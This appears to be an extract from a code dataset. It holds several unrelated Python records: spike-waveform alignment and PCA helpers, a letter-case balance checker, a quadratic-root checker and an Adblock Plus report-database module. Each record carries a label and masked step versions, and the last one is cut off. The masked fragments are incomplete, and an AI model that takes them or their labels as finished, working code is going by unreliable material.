""" wav = np.array(wavform) sgn = np.sign(thr) if np.max(wav[rng[0]:rng[1]] * sgn) < np.abs(thr): return None # reject """ NOT USED -- GIVES IMPRECISE RESULT # -- align: find the steepest point having the same sign as `sgn` df = np.diff(wav) si = np.argsort(-sgn * df) # reverse sorted for i in si: if np.sign(wav[i]) == sgn: break """ # -- align: find the point where waveform crosses `thr` n = len(wav) for i in range(n - 1): if sgn * wav[i] <= sgn * thr and sgn * thr <= sgn * wav[i + 1]: break if i == n - 2: # although i could be n - 2, it's highly likely an artifact return None n_shift = n_pre - i - 1 # > 0: right shift, < 0: left shift if n_shift == 0: return wav wavnew = np.empty(wav.shape) wavnew[n_shift:] = wav[:-n_shift] # PBC shifting wavnew[:n_shift] = wav[-n_shift:] # -- done: but if the spike doesn't change its sign # within `i_chg`, reject. if np.max(-sgn * wavnew[n_pre:i_chg]) < 0: return None """ DEBUG if np.abs(n_shift) > 3: print '!!!', n_shift, '/', i, '/', n print '---', np.max(-sgn * wavnew[n_pre:i_chg]) print list(wav) print list(wavnew) """ return wavnew def set_new_threshold_rng(wav, thr, rng=(11, 13), i_chg=32): return set_new_threshold(wav, thr, rng=rng, i_chg=i_chg) # return set_new_threshold(wav, thr) # ----------------------------------------------------------------------------- # Math codes DEFAULT_N_PCA = 3 def fastnorm(x): # fastnorm: from Nicolas' code xv = x.ravel() return np.dot(xv, xv) ** 0.5 # fastsvd: from Nicolas' code def fastsvd(M): h, w = M.shape # -- thin matrix if h >= w: # subspace of M'M U, S, V = np.linalg.svd(np.dot(M.T, M)) U = np.dot(M, V.T) # normalize for i in xrange(w): S[i] = fastnorm(U[:, i]) U[:, i] = U[:, i] / S[i] # -- fat matrix else: # subspace of MM' U, S, V = np.linalg.svd(np.dot(M, M.T)) V = np.dot(U.T, M) # normalize for i in xrange(h): S[i] = fastnorm(V[i]) V[i, :] = V[i] / S[i] return U, S, V def pca_eigvec(M, pca_threshold=DEFAULT_N_PCA): U, S, V = fastsvd(M) eigvectors = V.T eigvectors = eigvectors[:, :pca_threshold] # this gives PCA: # M = np.dot(M, eigvectors) return eigvectors
normal
{ "blob_id": "c2ee716b72652035502a1f07dfe8aa68a104b2bb", "index": 8255, "step-1": "import numpy as np\nimport os\n\n# ----------------------------------------------------------------------------\n# Common variables\n\n# shifting channels based on rules:\n# CH_SHIFT[rule_name] = {src_1_based_ch:new_1_based_ch}\nCH_SHIFT = {}\nCH_SHIFT[None] = None\n# for 1-to-1 cards\nCH_SHIFT['1to1'] = {}\nfor ch1 in xrange(1, 49):\n CH_SHIFT['1to1'][ch1] = ch1\nfor ch1 in xrange(81, 129):\n CH_SHIFT['1to1'][ch1] = ch1 - 32\n\n# for 20110720A: assign all 40 A channels to 1-40\n# and all 70 M channels to 41-110\nCH_SHIFT['20110720A'] = {1: 41, 2: 42, 3: 43, 4: 44, 5: 45, 6: 46,\n 7: 47, 8: 48, 9: 49, 10: 50, 11: 51, 12: 52, 13: 53, 14: 54,\n 15: 55, 16: 56, 17: 57, 18: 58, 19: 59, 20: 60, 21: 61,\n 22: 62, 23: 63, 24: 64, 25: 65, 26: 66, 27: 67, 28: 68,\n 29: 69, 30: 70, 31: 71, 32: 72, 33: 73, 34: 74, 35: 75,\n 44: 1, 45: 2, 46: 3, 47: 4, 48: 5, 49: 6, 50: 7, 51: 8,\n 52: 9, 53: 10, 54: 11, 55: 12, 56: 13, 57: 14, 58: 15,\n 59: 16, 60: 17, 61: 18, 62: 19, 63: 20, 64: 21, 65: 22,\n 66: 23, 67: 24, 68: 25, 69: 26, 70: 27, 71: 28, 72: 29,\n 73: 30, 74: 31, 75: 32, 76: 33, 77: 34, 78: 35, 79: 36,\n 80: 37, 81: 38, 82: 39, 83: 40, 94: 76, 95: 77, 96: 78,\n 97: 79, 98: 80, 99: 81, 100: 82, 101: 83, 102: 84, 103: 85,\n 104: 86, 105: 87, 106: 88, 107: 89, 108: 90, 109: 91,\n 110: 92, 111: 93, 112: 94, 113: 95, 114: 96, 115: 97,\n 116: 98, 117: 99, 118: 100, 119: 101, 120: 102, 121: 103,\n 122: 104, 123: 105, 124: 106, 125: 107, 126: 108,\n 127: 109, 128: 110}\n\n\n# ----------------------------------------------------------------------------\n# Common functions\ndef seq_search(iterable, target):\n \"\"\"do sequential search\"\"\"\n for i, e in enumerate(iterable):\n if e != target:\n continue\n return i\n return None\n\n\ndef sort_uniq(base, *args):\n \"\"\"sort and remove duplicates based on `base` and apply on to `args`\"\"\"\n if len(args) == 0:\n return None\n res = []\n # sort\n si = np.argsort(base)\n base = np.array(base[si])\n for arg in args:\n res.append(np.array(arg[si]))\n # remove duplicates\n di = np.nonzero(np.diff(base) == 0)[0]\n si = list(set(range(len(base))) - set(list(di)))\n for i in xrange(len(res)):\n res[i] = np.array(res[i][si])\n return res\n\n\n# -----------------------------------------------------------------------------\ndef parse_opts(opts0):\n \"\"\"Parse the options in the command line. This somewhat\n archaic function mainly exists for backward-compatability.\"\"\"\n opts = {}\n # parse the stuff in \"opts\"\n for opt in opts0:\n parsed = opt.split('=')\n key = parsed[0].strip()\n if len(parsed) > 1:\n # OLD: cmd = parsed[1].strip()\n cmd = '='.join(parsed[1:]).strip()\n else:\n cmd = ''\n opts[key] = cmd\n\n return opts\n\n\ndef parse_opts2(tokens, optpx='--', argparam=False):\n \"\"\"A newer option parser. 
(from perf102)\"\"\"\n opts0 = []\n args = []\n n = len(optpx)\n\n for token in tokens:\n if token[:2] == optpx:\n opts0.append(token[n:])\n else:\n if argparam:\n token = token.split('=')\n args.append(token)\n\n opts = parse_opts(opts0)\n\n return args, opts\n\n\ndef parse_opts_adapter(tokens, delim, optpx='--', argparam=False):\n \"\"\"Adapter to support both old- and new-style options\"\"\"\n if any([t.startswith(optpx) for t in tokens]):\n # new style\n args, opts = parse_opts2(tokens, optpx=optpx, argparam=argparam)\n else:\n # old style\n args = tokens[:delim]\n opts = parse_opts(tokens[delim:])\n return args, opts\n\n\ndef makeavail(sth, sth2idx, idx2sth, query=None):\n if sth not in sth2idx:\n if query is not None and not query(sth):\n return\n sth2idx[sth] = len(idx2sth)\n idx2sth.append(sth)\n\n\ndef prep_files(flist, sep=',', extchk=True):\n flist = flist.split(sep)\n if flist[0][0] == '+':\n flist = [f.strip() for f in open(flist[0][1:]).readlines()]\n if extchk:\n assert all([os.path.exists(f) for f in flist])\n\n return flist\n\n\ndef prepare_save_dir(sav_dir):\n if sav_dir != '' and not os.path.exists(sav_dir):\n try:\n os.makedirs(sav_dir)\n # in massively-parallel env, it is possible that\n # the sav_dir is created after os.path.exists() check.\n # We just ignore if makedirs fails.\n except Exception:\n pass\n\n\ndef detect_cpus():\n # Linux, Unix and MacOS:\n if hasattr(os, \"sysconf\"):\n if 'SC_NPROCESSORS_ONLN' in os.sysconf_names:\n # Linux & Unix:\n ncpus = os.sysconf(\"SC_NPROCESSORS_ONLN\")\n if isinstance(ncpus, int) and ncpus > 0:\n return ncpus\n else: # OSX:\n return int(os.popen2(\"sysctl -n hw.ncpu\")[1].read())\n # Windows:\n if 'NUMBER_OF_PROCESSORS' in os.environ:\n ncpus = int(os.environ[\"NUMBER_OF_PROCESSORS\"])\n if ncpus > 0:\n return ncpus\n return 1\n\n\n# -----------------------------------------------------------------------------\n# Peri-stimulus data extraction related\nN_PRE_PT = 11\nSEARCH_RNG = [6, 16]\nT_REJECT = 10\nN_REJECT = 50\n\n\ndef invalidate_artifacts(buf0, t_reject=T_REJECT,\n n_reject=N_REJECT, verbose=True):\n \"\"\"If there are more than `N_REJET` spikes within `T_REJECT`us window,\n invalidate all of them.\n \"\"\"\n ti_all = [(b['timestamp'], i) for i, b in enumerate(buf0)]\n ti_all = sorted(ti_all)\n t_all = np.array([t[0] for t in ti_all])\n i_all = [t[1] for t in ti_all]\n\n nb = len(buf0)\n ri = range(nb)\n i = 0\n while i < nb - 1:\n ii = []\n t0 = t_all[i]\n for j in xrange(i + 1, nb):\n if t_all[j] < t0 + t_reject:\n ii.append(j)\n else:\n break\n i = j\n\n if len(ii) < n_reject:\n continue\n for ix in ii:\n try:\n ri.remove(i_all[ix])\n except ValueError:\n pass\n\n buf = [buf0[i] for i in ri]\n if verbose and len(buf) != nb:\n print '* Rejecting', nb - len(buf), 'spikes.'\n return buf\n\n\ndef set_new_threshold(wavform, thr, n_pre=N_PRE_PT, rng=SEARCH_RNG, i_chg=20):\n \"\"\"Set new threshold `thr`.\n If the `waveform` cannot pass `thr` returns None.\n The new waveform is re-aligned based on the steepest point.\n The returned new waveform has `n_pre` points before the alignment point.\n \"\"\"\n wav = np.array(wavform)\n sgn = np.sign(thr)\n if np.max(wav[rng[0]:rng[1]] * sgn) < np.abs(thr): return None # reject\n\n \"\"\" NOT USED -- GIVES IMPRECISE RESULT\n # -- align: find the steepest point having the same sign as `sgn`\n df = np.diff(wav)\n si = np.argsort(-sgn * df) # reverse sorted\n for i in si:\n if np.sign(wav[i]) == sgn: break\n \"\"\"\n # -- align: find the point where waveform crosses `thr`\n n = 
len(wav)\n for i in range(n - 1):\n if sgn * wav[i] <= sgn * thr and sgn * thr <= sgn * wav[i + 1]:\n break\n if i == n - 2:\n # although i could be n - 2, it's highly likely an artifact\n return None\n n_shift = n_pre - i - 1 # > 0: right shift, < 0: left shift\n if n_shift == 0:\n return wav\n\n wavnew = np.empty(wav.shape)\n wavnew[n_shift:] = wav[:-n_shift] # PBC shifting\n wavnew[:n_shift] = wav[-n_shift:]\n\n # -- done: but if the spike doesn't change its sign\n # within `i_chg`, reject.\n if np.max(-sgn * wavnew[n_pre:i_chg]) < 0:\n return None\n\n \"\"\" DEBUG\n if np.abs(n_shift) > 3:\n print '!!!', n_shift, '/', i, '/', n\n print '---', np.max(-sgn * wavnew[n_pre:i_chg])\n print list(wav)\n print list(wavnew)\n \"\"\"\n\n return wavnew\n\n\ndef set_new_threshold_rng(wav, thr, rng=(11, 13), i_chg=32):\n return set_new_threshold(wav, thr, rng=rng, i_chg=i_chg)\n # return set_new_threshold(wav, thr)\n\n\n# -----------------------------------------------------------------------------\n# Math codes\nDEFAULT_N_PCA = 3\n\n\ndef fastnorm(x):\n # fastnorm: from Nicolas' code\n xv = x.ravel()\n return np.dot(xv, xv) ** 0.5\n\n\n# fastsvd: from Nicolas' code\ndef fastsvd(M):\n h, w = M.shape\n # -- thin matrix\n if h >= w:\n # subspace of M'M\n U, S, V = np.linalg.svd(np.dot(M.T, M))\n U = np.dot(M, V.T)\n # normalize\n for i in xrange(w):\n S[i] = fastnorm(U[:, i])\n U[:, i] = U[:, i] / S[i]\n # -- fat matrix\n else:\n # subspace of MM'\n U, S, V = np.linalg.svd(np.dot(M, M.T))\n V = np.dot(U.T, M)\n # normalize\n for i in xrange(h):\n S[i] = fastnorm(V[i])\n V[i, :] = V[i] / S[i]\n return U, S, V\n\n\ndef pca_eigvec(M, pca_threshold=DEFAULT_N_PCA):\n U, S, V = fastsvd(M)\n eigvectors = V.T\n eigvectors = eigvectors[:, :pca_threshold]\n # this gives PCA:\n # M = np.dot(M, eigvectors)\n return eigvectors\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ] }
[ 0 ]
import sys ''' Given a string, does the string contain an equal number of uppercase and lowercase letters? Ignore whitespace, numbers, and punctuation. Return the string “true” if balanced or the string “false” if not balanced. ''' for line in sys.stdin: lower = 0 upper = 0 # Count number of lowercase and uppercase letters for x in range(0, len(line)): if 'a' <= line[x] <= 'z': lower = lower + 1 elif 'A' <= line[x] <= 'Z': upper = upper + 1 # Determine if balanced or not if lower == upper: print('true') else: print('false') # Repeat for each input line
normal
{ "blob_id": "4b3664153940b064b424bd77de473a6409437f88", "index": 3279, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor line in sys.stdin:\n lower = 0\n upper = 0\n for x in range(0, len(line)):\n if 'a' <= line[x] <= 'z':\n lower = lower + 1\n elif 'A' <= line[x] <= 'Z':\n upper = upper + 1\n if lower == upper:\n print('true')\n else:\n print('false')\n", "step-3": "import sys\n<mask token>\nfor line in sys.stdin:\n lower = 0\n upper = 0\n for x in range(0, len(line)):\n if 'a' <= line[x] <= 'z':\n lower = lower + 1\n elif 'A' <= line[x] <= 'Z':\n upper = upper + 1\n if lower == upper:\n print('true')\n else:\n print('false')\n", "step-4": "import sys\n\n'''\nGiven a string, does the string contain an equal number of uppercase and \nlowercase letters? Ignore whitespace, numbers, and punctuation. Return the \nstring “true” if balanced or the string “false” if not balanced.\n'''\nfor line in sys.stdin:\n lower = 0\n upper = 0\n\n # Count number of lowercase and uppercase letters\n for x in range(0, len(line)):\n if 'a' <= line[x] <= 'z':\n lower = lower + 1\n elif 'A' <= line[x] <= 'Z':\n upper = upper + 1\n\n # Determine if balanced or not\n if lower == upper:\n print('true')\n else:\n print('false')\n\n # Repeat for each input line\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
def checkRaiz(): a = int(input("Informe o primeiro coeficiente: ")) b = int(input("Informe o segundo coeficiente: ")) c = int(input("Informe o terceiro coeficiente: ")) delta = (b*b) - (4*a*c) if (delta < 0): print("Não tem raiz real") elif (delta == 0): print("Existe uma raiz real") else: print("Existem duas raizes reais") checkRaiz()
normal
{ "blob_id": "603a73a7cc0487fcabb527ebc21d44cb95817ecb", "index": 5909, "step-1": "<mask token>\n", "step-2": "def checkRaiz():\n a = int(input('Informe o primeiro coeficiente: '))\n b = int(input('Informe o segundo coeficiente: '))\n c = int(input('Informe o terceiro coeficiente: '))\n delta = b * b - 4 * a * c\n if delta < 0:\n print('Não tem raiz real')\n elif delta == 0:\n print('Existe uma raiz real')\n else:\n print('Existem duas raizes reais')\n\n\n<mask token>\n", "step-3": "def checkRaiz():\n a = int(input('Informe o primeiro coeficiente: '))\n b = int(input('Informe o segundo coeficiente: '))\n c = int(input('Informe o terceiro coeficiente: '))\n delta = b * b - 4 * a * c\n if delta < 0:\n print('Não tem raiz real')\n elif delta == 0:\n print('Existe uma raiz real')\n else:\n print('Existem duas raizes reais')\n\n\ncheckRaiz()\n", "step-4": "\ndef checkRaiz():\n a = int(input(\"Informe o primeiro coeficiente: \"))\n b = int(input(\"Informe o segundo coeficiente: \"))\n c = int(input(\"Informe o terceiro coeficiente: \"))\n\n delta = (b*b) - (4*a*c)\n\n if (delta < 0):\n print(\"Não tem raiz real\")\n elif (delta == 0):\n print(\"Existe uma raiz real\")\n else:\n print(\"Existem duas raizes reais\")\n\ncheckRaiz()", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# This file is part of the Adblock Plus web scripts, # Copyright (C) 2006-present eyeo GmbH # # Adblock Plus is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License version 3 as # published by the Free Software Foundation. # # Adblock Plus is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Adblock Plus. If not, see <http://www.gnu.org/licenses/>. import hashlib import hmac import base64 import MySQLdb import os import re import marshal import subprocess from sitescripts.utils import get_config, cached, get_template, anonymizeMail, sendMail def getReportSubscriptions(guid): cursor = get_db().cursor(MySQLdb.cursors.DictCursor) executeQuery(cursor, '''SELECT url, hasmatches FROM #PFX#sublists INNER JOIN #PFX#subscriptions ON (#PFX#sublists.list = #PFX#subscriptions.id) WHERE report = %s''', guid) rows = cursor.fetchall() cursor.close() return rows def getReports(startTime): count = 10000 offset = 0 while True: cursor = get_db().cursor(MySQLdb.cursors.DictCursor) executeQuery(cursor, '''SELECT guid, type, UNIX_TIMESTAMP(ctime) AS ctime, status, site, contact, comment, hasscreenshot, knownissues FROM #PFX#reports WHERE ctime >= FROM_UNIXTIME(%s) LIMIT %s OFFSET %s''', (startTime, count, offset)) rows = cursor.fetchall() cursor.close() if len(rows) == 0: break for row in rows: yield row offset += len(rows) def getReportsForUser(contact): cursor = get_db().cursor(MySQLdb.cursors.DictCursor) executeQuery(cursor, '''SELECT guid, type, UNIX_TIMESTAMP(ctime) AS ctime, status, site, contact, comment, hasscreenshot, knownissues FROM #PFX#reports WHERE contact = %s ORDER BY ctime DESC LIMIT 100''', contact) rows = cursor.fetchall() cursor.close() return rows def getReport(guid): cursor = get_db().cursor() executeQuery(cursor, 'SELECT dump FROM #PFX#reports WHERE guid = %s', guid) report = cursor.fetchone() if report == None: return None reportData = marshal.loads(report[0]) return reportData def saveReport(guid, reportData, isNew=False): cursor = get_db().cursor() screenshot = reportData.get('screenshot', None) if screenshot != None: reportData['hasscreenshot'] = 2 if reportData.get('screenshotEdited', False) else 1 try: saveScreenshot(guid, screenshot) except (TypeError, UnicodeEncodeError): reportData['hasscreenshot'] = 0 del reportData['screenshot'] knownIssues = len(reportData.get('knownIssues', [])) contact = getUserId(reportData.get('email', None)) if reportData.get('email', None) else None dumpstr = marshal.dumps(reportData) if contact != None and isNew: executeQuery(cursor, 'INSERT INTO #PFX#users (id, reports) VALUES (%s, 1) ON DUPLICATE KEY UPDATE reports = reports + 1', contact) executeQuery(cursor, '''INSERT INTO #PFX#reports (guid, type, ctime, site, comment, status, contact, hasscreenshot, knownissues, dump) VALUES (%(guid)s, %(type)s, FROM_UNIXTIME(%(ctime)s), %(site)s, %(comment)s, %(status)s, %(contact)s, %(hasscreenshot)s, %(knownissues)s, _binary %(dump)s) ON DUPLICATE KEY UPDATE type = %(type)s, site = %(site)s, comment = %(comment)s, status = %(status)s, hasscreenshot = %(hasscreenshot)s, knownissues = %(knownissues)s, dump = _binary %(dump)s''', {'guid': guid, 'type': reportData.get('type', None), 'ctime': reportData['time'], 'site': reportData.get('siteName', None), 
'comment': reportData.get('comment', None), 'status': reportData.get('status', None), 'contact': contact, 'hasscreenshot': reportData.get('hasscreenshot', 0), 'knownissues': knownIssues, 'dump': dumpstr}) if len(reportData['subscriptions']) > 0: for sn in reportData['subscriptions']: executeQuery(cursor, 'SELECT id FROM #PFX#subscriptions WHERE url = %s', sn['id']) id = cursor.fetchone() if id != None: def filterMatch(f): return any(u == sn['id'] for u in f.get('subscriptions', [])) hasMatches = any(filterMatch(f) for f in reportData.get('filters', [])) executeQuery(cursor, 'INSERT IGNORE INTO #PFX#sublists (report, list, hasmatches) VALUES (%s, %s, %s)', (guid, id[0], hasMatches)) get_db().commit() reportData['guid'] = guid if contact: # TODO: The mail anonymization should happen in the template, not here origEmail = reportData['email'] email = reportData['email'] email = re.sub(r' at ', r'@', email) email = re.sub(r' dot ', r'.', email) reportData['email'] = anonymizeMail(email) reportData['uid'] = contact file = os.path.join(get_config().get('reports', 'dataPath'), guid[0], guid[1], guid[2], guid[3], guid + '.html') dir = os.path.dirname(file) if not os.path.exists(dir): os.makedirs(dir) template = get_template(get_config().get('reports', 'webTemplate')) template.stream(reportData).dump(file, encoding='utf-8') if contact: reportData['email'] = origEmail def removeReport(guid): cursor = get_db().cursor() executeQuery(cursor, 'DELETE FROM #PFX#reports WHERE guid = %s', guid) get_db().commit() file = os.path.join(get_config().get('reports', 'dataPath'), guid[0], guid[1], guid[2], guid[3], guid + '.html') if os.path.isfile(file): os.remove(file) file = os.path.join(get_config().get('reports', 'dataPath'), guid[0], guid[1], guid[2], guid[3], guid + '.png') if os.path.isfile(file): os.remove(file) def getUser(contact): cursor = get_db().cursor(MySQLdb.cursors.DictCursor) executeQuery(cursor, 'SELECT reports, positive, negative FROM #PFX#users WHERE id = %s', contact) user = cursor.fetchone() return user @cached(3600) def getUserUsefulnessScore(contact): if contact == None: return 0 cursor = get_db().cursor() # source from http://www.evanmiller.org/how-not-to-sort-by-average-rating.html executeQuery(cursor, '''SELECT ((positive + 1.9208) / (positive + negative) - 1.96 * SQRT((positive * negative) / (positive + negative) + 0.9604) / (positive + negative)) / (1 + 3.8416 / (positive + negative)) AS score FROM #PFX#users WHERE id = %s''', contact) score = cursor.fetchone() if score == None: return 0 if score[0] == None: # no score yet return 0.3 else: return 4 * score[0] def updateUserUsefulness(contact, newusefulness, oldusefulness): new = int(newusefulness) old = int(oldusefulness) if new == old: return positive = 0 negative = 0 if old > 0: positive -= 1 elif old < 0: negative -= 1 if new > 0: positive += 1 elif new < 0: negative += 1 cursor = get_db().cursor() executeQuery(cursor, 'UPDATE #PFX#users SET negative = negative + %s, positive = positive + %s WHERE id = %s', (negative, positive, contact)) get_db().commit() def saveScreenshot(guid, screenshot): prefix = 'data:image/png;base64,' if not screenshot.startswith(prefix): raise TypeError('Screenshot is not a PNG image') data = base64.b64decode(screenshot[len(prefix):]) file = os.path.join(get_config().get('reports', 'dataPath'), guid[0], guid[1], guid[2], guid[3], guid + '.png') dir = os.path.dirname(file) if not os.path.exists(dir): os.makedirs(dir) f = open(file, 'wb') f.write(data) f.close() if get_config().has_option('reports', 
'pngOptimizerPath'): cmd = get_config().get('reports', 'pngOptimizerPath').split() cmd.append(file) subprocess.call(cmd) def mailDigest(templateData): sendMail(get_config().get('reports', 'mailDigestTemplate'), templateData) def sendUpdateNotification(templateData): sendMail(get_config().get('reports', 'notificationTemplate'), templateData) def calculateReportSecret(guid): return hmac.new(get_config().get('reports', 'secret'), guid).hexdigest() def calculateReportSecret_compat(guid): hash = hashlib.md5() hash.update(get_config().get('reports', 'secret')) hash.update(guid) return hash.hexdigest() def getUserId(email): return hmac.new(get_config().get('reports', 'secret'), email.encode('utf-8')).hexdigest() def getDigestId(email): hash = hashlib.md5() hash.update(email.encode('utf-8')) return hash.hexdigest() def getDigestPath(dir, email): return os.path.join(dir, getDigestId(email) + '.html') def getDigestSecret(id, (year, week, weekday)): mac = hmac.new(get_config().get('reports', 'secret'), id) mac.update(str(year)) mac.update(str(week)) return mac.hexdigest() def getDigestSecret_compat(id, (year, week, weekday)): hash = hashlib.md5() hash.update(get_config().get('reports', 'secret')) hash.update(id) hash.update(str(year)) hash.update(str(week)) return hash.hexdigest() @cached(600) def get_db(): database = get_config().get('reports', 'database') dbuser = get_config().get('reports', 'dbuser') dbpasswd = get_config().get('reports', 'dbpassword') if os.name == 'nt': return MySQLdb.connect(user=dbuser, passwd=dbpasswd, db=database, use_unicode=True, charset='utf8', named_pipe=True) else: return MySQLdb.connect(user=dbuser, passwd=dbpasswd, db=database, use_unicode=True, charset='utf8') def executeQuery(cursor, query, args=None): tablePrefix = get_config().get('reports', 'dbprefix') query = re.sub(r'#PFX#', tablePrefix, query) cursor.execute(query, args)
normal
{ "blob_id": "bfc6f6acef26e3dc4f6bf2b76363daec68c53cd1", "index": 5709, "step-1": "# This file is part of the Adblock Plus web scripts,\n# Copyright (C) 2006-present eyeo GmbH\n#\n# Adblock Plus is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 3 as\n# published by the Free Software Foundation.\n#\n# Adblock Plus is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Adblock Plus. If not, see <http://www.gnu.org/licenses/>.\n\nimport hashlib\nimport hmac\nimport base64\nimport MySQLdb\nimport os\nimport re\nimport marshal\nimport subprocess\nfrom sitescripts.utils import get_config, cached, get_template, anonymizeMail, sendMail\n\n\ndef getReportSubscriptions(guid):\n cursor = get_db().cursor(MySQLdb.cursors.DictCursor)\n executeQuery(cursor,\n '''SELECT url, hasmatches FROM #PFX#sublists INNER JOIN\n #PFX#subscriptions ON (#PFX#sublists.list = #PFX#subscriptions.id)\n WHERE report = %s''',\n guid)\n rows = cursor.fetchall()\n cursor.close()\n return rows\n\n\ndef getReports(startTime):\n count = 10000\n offset = 0\n while True:\n cursor = get_db().cursor(MySQLdb.cursors.DictCursor)\n executeQuery(cursor,\n '''SELECT guid, type, UNIX_TIMESTAMP(ctime) AS ctime, status, site, contact,\n comment, hasscreenshot, knownissues\n FROM #PFX#reports WHERE ctime >= FROM_UNIXTIME(%s) LIMIT %s OFFSET %s''',\n (startTime, count, offset))\n rows = cursor.fetchall()\n cursor.close()\n if len(rows) == 0:\n break\n for row in rows:\n yield row\n offset += len(rows)\n\n\ndef getReportsForUser(contact):\n cursor = get_db().cursor(MySQLdb.cursors.DictCursor)\n executeQuery(cursor,\n '''SELECT guid, type, UNIX_TIMESTAMP(ctime) AS ctime, status, site, contact,\n comment, hasscreenshot, knownissues\n FROM #PFX#reports WHERE contact = %s ORDER BY ctime DESC LIMIT 100''',\n contact)\n rows = cursor.fetchall()\n cursor.close()\n return rows\n\n\ndef getReport(guid):\n cursor = get_db().cursor()\n executeQuery(cursor, 'SELECT dump FROM #PFX#reports WHERE guid = %s', guid)\n report = cursor.fetchone()\n if report == None:\n return None\n\n reportData = marshal.loads(report[0])\n return reportData\n\n\ndef saveReport(guid, reportData, isNew=False):\n cursor = get_db().cursor()\n screenshot = reportData.get('screenshot', None)\n if screenshot != None:\n reportData['hasscreenshot'] = 2 if reportData.get('screenshotEdited', False) else 1\n try:\n saveScreenshot(guid, screenshot)\n except (TypeError, UnicodeEncodeError):\n reportData['hasscreenshot'] = 0\n del reportData['screenshot']\n knownIssues = len(reportData.get('knownIssues', []))\n contact = getUserId(reportData.get('email', None)) if reportData.get('email', None) else None\n dumpstr = marshal.dumps(reportData)\n\n if contact != None and isNew:\n executeQuery(cursor, 'INSERT INTO #PFX#users (id, reports) VALUES (%s, 1) ON DUPLICATE KEY UPDATE reports = reports + 1', contact)\n executeQuery(cursor,\n '''INSERT INTO #PFX#reports (guid, type, ctime, site, comment, status, contact, hasscreenshot, knownissues, dump)\n VALUES (%(guid)s, %(type)s, FROM_UNIXTIME(%(ctime)s), %(site)s, %(comment)s, %(status)s, %(contact)s,\n %(hasscreenshot)s, %(knownissues)s, _binary %(dump)s) ON DUPLICATE KEY\n UPDATE type = %(type)s, site = %(site)s, comment = 
%(comment)s, status = %(status)s,\n hasscreenshot = %(hasscreenshot)s, knownissues = %(knownissues)s, dump = _binary %(dump)s''',\n {'guid': guid, 'type': reportData.get('type', None), 'ctime': reportData['time'], 'site': reportData.get('siteName', None),\n 'comment': reportData.get('comment', None), 'status': reportData.get('status', None), 'contact': contact,\n 'hasscreenshot': reportData.get('hasscreenshot', 0), 'knownissues': knownIssues, 'dump': dumpstr})\n if len(reportData['subscriptions']) > 0:\n for sn in reportData['subscriptions']:\n executeQuery(cursor, 'SELECT id FROM #PFX#subscriptions WHERE url = %s', sn['id'])\n id = cursor.fetchone()\n if id != None:\n def filterMatch(f):\n return any(u == sn['id'] for u in f.get('subscriptions', []))\n hasMatches = any(filterMatch(f) for f in reportData.get('filters', []))\n executeQuery(cursor, 'INSERT IGNORE INTO #PFX#sublists (report, list, hasmatches) VALUES (%s, %s, %s)', (guid, id[0], hasMatches))\n\n get_db().commit()\n\n reportData['guid'] = guid\n if contact:\n # TODO: The mail anonymization should happen in the template, not here\n origEmail = reportData['email']\n email = reportData['email']\n email = re.sub(r' at ', r'@', email)\n email = re.sub(r' dot ', r'.', email)\n reportData['email'] = anonymizeMail(email)\n reportData['uid'] = contact\n\n file = os.path.join(get_config().get('reports', 'dataPath'), guid[0], guid[1], guid[2], guid[3], guid + '.html')\n dir = os.path.dirname(file)\n if not os.path.exists(dir):\n os.makedirs(dir)\n template = get_template(get_config().get('reports', 'webTemplate'))\n template.stream(reportData).dump(file, encoding='utf-8')\n\n if contact:\n reportData['email'] = origEmail\n\n\ndef removeReport(guid):\n cursor = get_db().cursor()\n executeQuery(cursor, 'DELETE FROM #PFX#reports WHERE guid = %s', guid)\n get_db().commit()\n file = os.path.join(get_config().get('reports', 'dataPath'), guid[0], guid[1], guid[2], guid[3], guid + '.html')\n if os.path.isfile(file):\n os.remove(file)\n file = os.path.join(get_config().get('reports', 'dataPath'), guid[0], guid[1], guid[2], guid[3], guid + '.png')\n if os.path.isfile(file):\n os.remove(file)\n\n\ndef getUser(contact):\n cursor = get_db().cursor(MySQLdb.cursors.DictCursor)\n executeQuery(cursor, 'SELECT reports, positive, negative FROM #PFX#users WHERE id = %s', contact)\n user = cursor.fetchone()\n return user\n\n\n@cached(3600)\ndef getUserUsefulnessScore(contact):\n if contact == None:\n return 0\n\n cursor = get_db().cursor()\n # source from http://www.evanmiller.org/how-not-to-sort-by-average-rating.html\n executeQuery(cursor,\n '''SELECT ((positive + 1.9208) / (positive + negative)\n - 1.96 * SQRT((positive * negative) / (positive + negative) + 0.9604) / (positive + negative))\n / (1 + 3.8416 / (positive + negative)) AS score FROM #PFX#users WHERE id = %s''',\n contact)\n score = cursor.fetchone()\n if score == None:\n return 0\n\n if score[0] == None: # no score yet\n return 0.3\n else:\n return 4 * score[0]\n\n\ndef updateUserUsefulness(contact, newusefulness, oldusefulness):\n new = int(newusefulness)\n old = int(oldusefulness)\n if new == old:\n return\n positive = 0\n negative = 0\n if old > 0:\n positive -= 1\n elif old < 0:\n negative -= 1\n if new > 0:\n positive += 1\n elif new < 0:\n negative += 1\n cursor = get_db().cursor()\n executeQuery(cursor, 'UPDATE #PFX#users SET negative = negative + %s, positive = positive + %s WHERE id = %s', (negative, positive, contact))\n get_db().commit()\n\n\ndef saveScreenshot(guid, screenshot):\n 
